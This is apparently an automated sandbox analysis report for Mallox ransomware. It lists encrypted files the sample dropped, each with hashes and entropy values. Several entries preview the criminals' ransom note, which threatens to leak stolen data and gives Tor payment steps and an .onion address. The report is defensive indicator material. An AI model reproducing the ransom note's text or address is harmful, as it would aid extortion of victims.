                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.50\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.50\LICENSE

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):24729
                    Entropy (8bit):7.992131487828613
                    Encrypted:true
                    SSDEEP:384:BauHDGBIx2T64R9JJM66dG3eWxEA5YDRfkb9nYoP5sQiaCtdp2r2XTDP4ZVS55dT:4uHDPv4VildG5EhpkOesACUM4zS5PN4U
                    MD5:E07F0A23B0B09389325DD969B8357A88
                    SHA1:82A25965E66D65A1189600A11686F4313D23FC3E
                    SHA-256:392A60383FC24D9E7FA3580E1CEFD8A6791CD845EE855949CCAD936A58FF47FA
                    SHA-512:2D7C3A7CAECC8C1A21A9FA63D7454D8E59637C7313AA08B9ED7DD18D6EC03CF30DECAF2A2697260A8D9D5DFC32D01117116376E89BCBBBEC30BE6535F23F7773
                    Malicious:true
                    Preview:.;Ewn..5......r. .a.C'F.U.v0bm.S.7..[(...U...*;N3....-..%.....\.&?.w...0........m...U..~v.r.Or..}......\.........fe..^...n.jR.X*.g"?j.U...c..0y...GA...V(.=...Wuwm..:.O2zh.j.R(w............../..nnO...>.`t....~..pXu......z..w.>&.. .V....y..?P .>.!=1>....f.2....nU...+...p..K.T..:o..I....*..h..T.FMT.s.J.K......\.o....D.....&"..U..DN...2$(|...F.r....C.z..*b......4...G...).^.q]t]~].PF....:.R.53!....Ux...L!1Qf...,/i..W0...4....GJ.yf...S;........i.O.{.....[..=.=.......W...Iwq.m.M.."...I...+..:h$(./..2.B.X(...K.8.?U..XrT.Jz6..+.v...T.q....(.=..pS}s-.)....".SF8....g>.?..Cf.9k.D.2<.y.......fs"..;.w...F....../9...:....>.....9..pF&D..]oT....i`$4....+....".V.:y.i..m.S..zt......Ai.0.'...+......Y%U/D.{.~{6o.Q.~L.8.. ..%.N.7..hq../../.9.Z..N...>F..[.FK.........e?G....>..4n..`1..X.y.Z..#...C..~.....k....I.%...a.`.4{ ./........n.7q'...f.3U$........w.0......%..7I%....lQ...uKe....X....e1...E...Y\.V^.q...n..u.@...(..v.`.....#..(.SL{V. CE.....i..6^

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.50\Ruleset Data

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):2983412
                    Entropy (8bit):7.999946474980346
                    Encrypted:true
                    SSDEEP:49152:+5hoxUb9MjvgWHmRhTP0otrGKjLoJxm9ICoMAUJLPJ4EdUZfbFn2ckzzihRHNp48:+5hmUiDHGX8oNlL8R05J4Hfx8gRtm8
                    MD5:741204AB6DB55B1F9975759BB1E79815
                    SHA1:31FBE94523EFFB0C25D24BCDA90DCCCE9C876F40
                    SHA-256:12767B65DDBD9F4D0A7032FB445FD437252D2BB78569560878C722052B28F673
                    SHA-512:D3E062D92D03C079F5BD3692011C4D777F3CEFBE32D09F6196E58F1FB42B0CA905F1226629856FE13B9D9A12CA2F7C412BA10F8DE31F451C67C107FD6D671816
                    Malicious:true
                    Preview:=.R/.DA.....^....w.Z$.U...y.....K.M........t..0...^.8|.Z..m....K.U,..M*.D.6.u}JE...F,=.N;..?.-?...{=n=8.]....kQ.3....\Sq|B.9.....l.a6._..m.;Oi...d!....Y.@=dm....{.[$66...j.qx.DO_.~..y&Z.2.:xl.@.@)....P.%....Aa..f<).4A....ln`w......?......&.........1......)q.:....'.0bbJ.D..l...s.....?...+/....;...."I..<1.-.N.^...=h.g.x..:'|6...B..8.\....b.QK..rH.]>.,9..kC..(.7.p.*.E=.N.....o....:w.S?.........}.Z/X4{....hVQ#.}6.sC..@...G9.Q.......G...).0...L..@..cq.O..%.v..7...9..I..`..n...ox;.j....N_.../........0=........".9..k..T.KC.S...dW.]..........j,'%v..%.<1q.M.6......D..I...p.q....3w.,....Sv.8..b.;..#I....p.......*.lc.P..x.q.Y}.....w.g..h......b$/...(.Ov....Anx[.f...0%#H.lFHy.vi.w..rM...h...7\"..../EP0.5;r........tg..oj.@..$..........*M....Y.t....{...l%..vqN...<&....A.e.x....^.8..<.(R.V)..K.....&k....S.c.....[.t*.$.......$.l..q.z......9..fA>.7b..].X?..3...Y..[...e.p]. 2...Rp7BWY17..k..{.m..s..8.~.....}..b.$.f(~.6.$L?R.6....SW....W...3....a..V..y.@....*....J.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Filtering Rules

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1850163
                    Entropy (8bit):7.999903080897401
                    Encrypted:true
                    SSDEEP:49152:87mmxChVFAbqaRBtyW9PnCsuGe5v6DAJ9aTclx9+E:87m/hG5yW9PCsuR8c1+E
                    MD5:5A022F2058444CC214FED7DD30FE4A00
                    SHA1:2B867BD4A679EDF6DF831FA7F4801B3447DDBDFE
                    SHA-256:1DDBFBC00CE0B4C87B76E4D926DFB4EEE31F0B216117B34E6FEB9A9177FB78F2
                    SHA-512:68134FDDC91301F95BEB9DD02F1F32A617622D5AB90F9C900A84540E1713AAFA4EDF8FC3DB08A5E543F3BDD0E9DA4DFBDDD7593D0586D45BD7846BD4CEF830AB
                    Malicious:true
                    Preview:d.x=..cG.D?.q0.<w.s....2.+...v..6`tL..M`.....I.D..y:.@V.W...[...r...j... ..N.q.........di....6~.u.?G..."..]h._..{.RK.|8.9I.........k.FS*.i......T...{@....5f:!..G.......f...rm.'.......B..3.d.......h.Q^.J.R.N..E..X.s..I......7.X.P.:.N...N-..N.^..&)/r...?j&......g..ZK.$...&x....9 %+.?..p..-.RD.1k..Jj.w.h..g..sf*...{..BN...k3.n....G.....D..+..D.2....../...@..T...:......$I.....X..n.....@,a...Q.@u.l.......3.3N......1.U....t).^...V..l...l....?:K..2as.{...xS\n.(.."0..D.7......lR*}*>3w..h..N.B.uRHI]......h_F#...}.Go.......D...5..y.TU.Vw.....vA.A.2,.._..{.."...,A...+q....Ml..B...g..M...4..%eG....F.....Q.}Z4....!.n......+2........m.i.Z...e....I..\...6...>g=".D...OMq.D...........EM...h.P.O<w.`?..bn..-O.u*.... ..(.=... .512.&.i..O.F...4.:J=.[..d.=]...E..y......q......f.F.O1..S.T....&.yD..!...3%v.=&.K........d..A.$/.x.r..d..~...."..sy....`..5O.:..g....d......N...^.....I.%...-7.rUr....Wu4dc..t.......3..~4~......L!....X...9Gm....t..."..P......

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Filtering Rules-AA

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):413670
                    Entropy (8bit):7.999542652248837
                    Encrypted:true
                    SSDEEP:6144:G9G9elNPcO6d1azKkGVuLUp+NKPsRnSJYIHYGXbuey1UrjR3pZioMfEJptwT3I:4SeAO6d3LUQYqfLuelh3bYfqgI
                    MD5:F44BC540B324574C2378F1870F6DFA9B
                    SHA1:C961FAD40DDA3D24E682E4800C2452816A2C9443
                    SHA-256:7405AF7ECD2F7FFB9E8436780CD52888F07F321B4AAA716A048F7700B552DC30
                    SHA-512:A10CB4BB231DEF931048CF329D2748401AB9314A1ED90F1039C989D6E082A067F0E4494B7F3F40179D211B12829EF67E5638FD8BE7467DE61865B7DC1302D750
                    Malicious:true
                    Preview:l.J...\.Q...7$.........#...i.x,hI........@.q ...Y6.....{ .\h..9....H.!o...vS..."{..n.....X.>:D..g....U...ja....MQ..1Z.I..AD..l...%F|.......Ka.5_9u[.y.d1...B.bh.3..>a..........r.R.e..L........j.+SF...........Eq..+ZIY8..d...\.:.-cq_;Lr..L....bGsx..^H..7.e..{l.O4;..x.!.L...'CDWh.<./t...n.]....r!b.E;R.l`.6....F5:@..r.O.^.|pux....!fF."...RE.`.S=H......%3.f...h.e..K...|;.({+3..I...dV....Om..]....\.B..g.6...ye../b.@.N..f&...t ..:L...jwe..<. .>6l.[..3..g.^..)..I... ._Q.bp..7.~4-......e~..v.........~%@\.X.j.gh......r.l...`Q....t...$..n........ ].)}.7m..6...,.U..W..f....]....2.....-.K....<d.8Y.y.g..5#..C.87m......O.peK.I.,3.Z......i.D...N..]..Ej.XS.....'...c....%...b.:.G...h...yc..VM.h...<.........K..G.Z6.L:..g.5;.....U........cG3..7`.}....-(.....=.w..s.o......B....}....^..V..k..r..`......W0.....V.l..w/.{.......p).....x..$./.p{7.....Zy...H.v.n..kK.._.......Y.y-.....,~U_j..N4b..j17.....`........I...TM.!.V....@X;j.t.c .N.[Y;#..s).g..s... .

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\LICENSE

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):24729
                    Entropy (8bit):7.992387389860218
                    Encrypted:true
                    SSDEEP:768:zkHzsDqxSmRY2t0CWE1Yenbl3zWrW8nvgp3de2Y1:zix7J6Anbl3zngvkEL
                    MD5:0D42114A2F47C70D4B3ED45AAD5081E4
                    SHA1:1ACA3AB8FE1B55A3E593278C74192C39B8CE9F8A
                    SHA-256:C9C5B841FD6D99BA8D327AD78511E1AB3EA0885C9783597E670B3A5CD1436936
                    SHA-512:EC424C41FF1975A7C858848A65194283A95E4DE3866FC8A2F8BAD357163AFCB2961A60DD9EB4ECF1047B59FAA042D7F7A83A14FC9DD8E0A0DD1DB34EB6D1C823
                    Malicious:true
                    Preview:5lL1.R.....#...)J.|i.>p.v..F.#...._......>2.E......Z..(............]..z..:.k...Q...|......Q..K.L&..!UOy....z%.._...6.9>..~.Ry#.}z..........e..:..|....2.j./..E..-P....9.,..~.....#/.(RC\....%.n.<E..B.f....`0...}.^........BQ..t%...el.%:M+.m....~.$'.;..B......G.$..S.t...'^..5..o.EM.C.a......0..:.q.7 .C..[C`. .....T....W._..@........I....;...Y~..p.p...w.S.....F.Q@..U.......v.h.]Y.,y.ZZE......M.w..W$.n_1]"....j.....H../V1..|.a.*...9..B}.r..os.).....K....4-]....I<.{.nLh...r.O...`P$........!...H.....n...Hm.......~...e'.....g..{...N$.7_..u...{...R~....-f:..../..;....%......Js;.......[..2.......&...9w..S6...Ql.}V...csV....j@k."..f"00...ze.."T).....q.I....Q....@....Q.gF.....!.w.q....w..$../....-...1.....&./_.K..$.t.....W....<.....Z.q.2..4...z......J,zmp2p..._Tk.Q...tR.wp:...B4..Plx..|z!....t......6{..O.VZwc%o..D..aJ.Q..B2|xL.>.P.....Y..=f2..b.._.......?\..uO.......7.":.lm.hd.;L.a..|.u.;....h^.A.Q.i}.S..O.o.+...t.(.Di.2If.VTb...$.m.....![......

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-DE

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):227595
                    Entropy (8bit):7.999187564280914
                    Encrypted:true
                    SSDEEP:6144:bjx1pZJdEjay8kGQNw6k/FzCDSYLGOTPg08Lmv1jODjRZ:nx1huQbOuFGPGOMCjoRZ
                    MD5:1C6146563B73C6968BFEB3B7C39E5B35
                    SHA1:AA965C3E265037848EC384CFBBE8795DD895E2D7
                    SHA-256:6C615AC38FCAE4E62E58206373ED4DE2360A11336F5CF047A9BDE6B2BB562899
                    SHA-512:DFB4A4BB1CA347F702AC25D5B0B2FC45A11F70333E7962534EB68C6E53D2B71551CBC4A2476AE768B459955EA5763CC9A04DA90D69FEEFF78D3851B76DDFD33C
                    Malicious:true
                    Preview:q.B/mf8..$Q...j.(...Q....)..7..k4`...f...!...........J..,.Y+...QO..l`7.;g...&........`..O..Lx......j.D...n...O"h[;.2RV.R.6I.]..*.+_.G.\..R.G]..9.g.......4C..E._d....2.T.l.yM..h<..V?'Vn,...k... ..'K...I._<....9....r..p1.D0*...-..".>~AA`:c..M..S...CR3]....H...>u.ou=....-...L1f.).4.h.'W.O..T.?KT}.$..........`\L.:..../.`...Q.JV......c.S.(".3.[....t.3.~.r..F....>.Q.R....*..E.../......`..[~=M.=#5.3n<a.H.......xFx.cM.p_|.y_;'.....7.q...Q.m...8.......l..1..[..Z....Uj}'..V..@.Rgh{j...t.......V."....^....z.{n0.:..!*F........k.;>Y.[x..:.4~!}r.......2.r$.T\..4.i.v.MG.6.@VB'`o....D.....W....`..T...P..k.CQ>.D.2.....g.rH.L7...7)KNL....zdx...FE....'q.a..>.vo.""....%h..n...[8.>].q;.u..H....r..}y0.....p...."j{.~U.t.d.z........G....y(..V._.y....n.|{..$..r.C x2.^l.$...v..N..+_...-B*&"..f.......pYN/.1..Up...X$.#)...=.z..?@...k.2..9....4j.o.-.\..h..{..8.9.A.....g.n..|...-....T.^i!.........<N..4...@W..O.fS.....#.....0*^.`/....@..r..X.+..95...q.!/.T!z.....z...z.G

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-ES

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:MPEG-4 LOAS
                    Category:dropped
                    Size (bytes):158269
                    Entropy (8bit):7.998677674560801
                    Encrypted:true
                    SSDEEP:3072:Bug1IZwTHuo+9Jn7NoapHgO5g413o2ny9nKN6uU3xuAy2/DdxE7n01mYuu3:cdZ4uooNoqHgOj13py9omModxmnQ
                    MD5:74EF552A4C23E340D59111C7FF4B0A15
                    SHA1:5709C13FD83B0D855393C8E37BAA18C6FB546191
                    SHA-256:2F40EC8060ED900809BD181A319642E5D3C05667750755289CABE08BC5EBA6FF
                    SHA-512:35A0821888E7C0B974D9D34F5B50A972D68E69F1A6D708D45065715664EE172F7FE44F57EB53AFDEBBC2BECA6698EAE5173E9AE2263F187C5D558913F0ED5844
                    Malicious:true
                    Preview:V... ).4.G...u..U.7a#8|.j~.B.L.._...6.........a.;..bN.o.....y..].=..'...x..-..}.....i.\,`..9.5..du.0..-?..5....2{.Z.c..<...eHV......`.SA,.\;.......Q..lL}.CJ.....k.!.<..Bi.:.l.z<U..am.k......-.(.T./.t@..yQ......E!.}....R..7...#-..K.M..5....,...4..Z9..#S......a...../r..K.v.h.......H5........vK.W....Fl....Bw.....B...M]..RN...........V.k.A.`6y"..l.ftx.........&.c.s0.O..Z..4.kb.L.>E..B.b..+7nY:....H..t..%rN2....!.....O..y..b..!...=.ODANL...>6.T.sI....EZY.x..N.l...Z.(.x.nN....HWM.\..I-.]....y..?=lk"..f.....Y.............a...i.@.U.&...h..+..T..h..N.kxF....J.....n...|dR.f....-...d...,.....#D..@k........4...\.N=..?...:..H9..E...D....K..b.....{.sO..."..O...w.?.w.t@..3.L.=..^.P.....7....H...E.)I...0..v......D...h.y<e8 .|GM{.?.:...]f]p....4x.?P..<...<.....{;..NaZ........rT.\......Kf}=Qz....v.)..xr..[.a....A....+V..5.........<o.Y..P....F........}cz...o[.........ih.0iD..r.[5..D...#.:..y..0...;.b5+.......+./.`.C.:.U/..28. ..fy..Z........d.$.k.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-FR

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):767031
                    Entropy (8bit):7.999763293972065
                    Encrypted:true
                    SSDEEP:12288:NR+gVSFJ97LxEZmXdLlsIQKACkcHmztAXxVxGUltcVF4tqNtrItp0brjAN2Y2z:NROAcBCIQKAZWXxuUltOF4t4trY23r
                    MD5:6DEEF37432A1337DCEC6C6A828335FE4
                    SHA1:4FF97C23C1D5517F74A5698B95E3CCA13C8B0B63
                    SHA-256:3ED203B3F4E7339B390B9A415B7E4BC6D9CAD9A13223CF05CD77082C2B664CA1
                    SHA-512:FFD51CC3A493918F527A1CF1E97A8D64DD54645D7F290382EFEFBA485C2A4274EFE52FB140D3A8837DD944011FAEEBB23ECA188BEDD34A94943D35AE8344BA6B
                    Malicious:true
                    Preview:..1qW?/.v.....9M4....E...\../..z..?...:.P4...t.{`...L..Z.R..(..$H.0.....$..C.o.0j.Q..!...rx.?.#....$.k.....~[DW.T(...pZ.3./4.....LM.O._.En...4..p.u...c.T...pQ.S;?q...Jg|.(=..`..c....k..(.k./...P.<=...G..0.=.Lbm.J.......s.bJS...P....mOk....-....~..g...e../.`.O.l...+\.!.+.f....V...T....T.0.^Fx-...*..{.8H.K...h..?ol0...^R.V-TuPA.d.W...j.bfY....%...v}/5.e.`..T..1...-..R@H9../|....).V.1.Z....K.'....fWG...d...... .S.M....F$......l.K.....T..o...X..1.......I....7.;e...E..p.. .F.}^[b.2...5...."]..~...i..&...".........Q...".t....r/..z*.*2W.r..VF._F.j.sVVI/+!r.+..W...5.".,y.~jO._..|..j.3.1JN.bb.Q.H.e.l.%...w.=.^Q.U@....|........M.8n.A..&.o...^_...)L.7_.BO..x~j...dY5U...S.....i..P_uY.~2...%....B?...t.|.k..%}.....g.s0..'...D.5T.......}.....k-.#0o.t..$.u..Wg.E..P..z[.$..Fn.."Ka.1..".....%...p...^.$f..p..W.yp.C=..SQ...n...._.W..*....".@S..!....@.m+c.W.5q.G.\y.F.j.....Q.j>gb[.. ....Q.A.....~...l...'..Z..~a.(YB...3/|..../.IX..;.....%...N-.?.?...O.Kbss

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-IT

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):510400
                    Entropy (8bit):7.9996218868177085
                    Encrypted:true
                    SSDEEP:6144:1fFJQkBz5ildpcDR4Y1BlMc9cTK2zam1YkBwtONi+uDYCwGh0/vcnBq4Thor8qrN:1fFJ1zOr6tW1hPzNiTHs/UXly8qIwERW
                    MD5:DA9E6092B113BE898A5ABEC54257585D
                    SHA1:EC858E0606C5FAEB0D6654D16F51FA8EA746E987
                    SHA-256:736BC41DB1871BCFC910F4D85751066B92EB567874388939C12F3BD19B3450C7
                    SHA-512:47CCB0D845569607FDDCB96EFC2E685EFACFE34E0E7A999DD1B0498AE59BCF54457C1559AC748D82B4F942F80DEC790387B548FC6E11E344A02916C934BC2845
                    Malicious:true
                    Preview:1....,]7.LJ.....0[.(.....Nv..........j<..n.&=...af.D.:A.S......FO%.Y.*.ZN.zd.7.q.A..I....(.....(...GBuwz%J.;..R9$.Y..A.&sY.........|6w.../.P..HP8...o=....ne.Ue.......a.........>'.Y...~4........v....<..-SA.Y.c6.:...Kg......D..s.S.@......,.a..c...Lo........v.....j..5.+.$I.{....q.s.aaW,g..<3.E".`...Mn..b..T.c}.7m.y..<.?9n<.f*A..\....56..-Su...<.R].I$0..kK.#m.)......{...7l3...I...j....uq.F0]..s...]@.O`R........q..Y....Jc.f..G.....g...,.BKzC..0r.(QR9T.p{n..f./.2.. .f..c.Q$U..w)bPB...`_..O........4era.3....wT/..i.8..w.Y.z.REA.(gg.=Z.CR.Be.:.oj..`.....t...[.s.....G.*.'_]..5.....`h..i..5.....N.+D.L.n..{0y<+..yh...]...)UJ.....!>./.`.~=.Ca........C*...V.......k).!uHNvE.."!66...m(i.....,j.,..)..ee`...a.D..8.Y.........rasa. .u._.U..|.+6..%....).Z.~x4..x..m.._.........$.KR\..Kl...._..#.w.d.b.k..! X..*.I.9.......s..$.W....L.l.c.w...5a..N..L0\a....rH.J..1.W..w...;'.$....t......[uF..C..&i.Y.m.}%.g.c.......q..~..23m.b"...$.....\.@....0.N.<e..h*.....O

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-NL

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):51983
                    Entropy (8bit):7.996406315375883
                    Encrypted:true
                    SSDEEP:1536:9/lTxvLSzcRWYLCs5iXE57fVeEeKVuqZC:39ePUtj5UEeKgD
                    MD5:1F97F48C85E23FF796167D6A6323A6A9
                    SHA1:92044597EE19E44083329926745E754D5005AA45
                    SHA-256:FBA1D6918CC37580DB13FE07834D9359152A4CBB1E5E0D9D24005E21484A4FC2
                    SHA-512:6696C0E3ACB65F8D1AFD5D519DF2F10C31CEA49E6D8689AFDF3D64D7F2A2B63AC429488389142CC07B2F325D1D47C5C69F21380A743B823F859913A4E817395F
                    Malicious:true
                    Preview:o.?:.u..g.........ym....(.a....G....'A...%(........OzJ....d..[......w...w .-S.U.......x...;.... V......_.A..T.g5@.6o..$......'?.J7.^..gQh...G\.jE.{.).;......o.l^.|u..G9).'..0..H...... ..z....W..x....0....9^o.).A.+.!..80;.3..,.Z...#X~7..R....M..s.9.Bs.....RJ.4.4`.l..9T..0+.58......T..w.D/9_m^.+$.m e..i.<L]".....rr[...D.K..Q........n1..&.q.^...ZS.gp...#=o..?#f..=L..Uq.v....y_..#.'`;......f..i.e..\.+.=C.UZ...Vr..k...#.7.W...Yv..q.O.4......5.H....T/t`I........?.kN....e.-..F....E.5.......u..B._..)....Z.f............#..:.w..a.........j........H..w.......W..Rv.R6.....J.r..zA,93..'.f?.......C......6..7..3i.5O[.j..S....P.p+p~.&jH.).../c...1.3....K>,-Dv+..9A.Ur..f....%.6...LDLtMi...>z..#k...b\.E.......[..eL......b._....6Q. ..5....8.?%....c.H1...?..T.....:...b.._..pb...C.P..d@..D.D.O.Y.hsh..L16..8,.u.S.%....A.}..Y........h.x..Yve.....p.x.t..#.!.^..Hv...>.......mn.....W..n..4O.J....6.Jv....B.05.XN..uD..~.P...ro'K.W.j#.>.....Aw1\b....)...#.m.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-RU

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1211639
                    Entropy (8bit):7.9998439919736
                    Encrypted:true
                    SSDEEP:24576:HgqPEn0n+AFUOG4HQ2/F2rU3uixIieR7knESZi15Cq/g8RXm7ooxu/zJ6:HnM0+o1QWwrUXIYti3oubJ6
                    MD5:A7512BF4792D30EE79CA6276C218C774
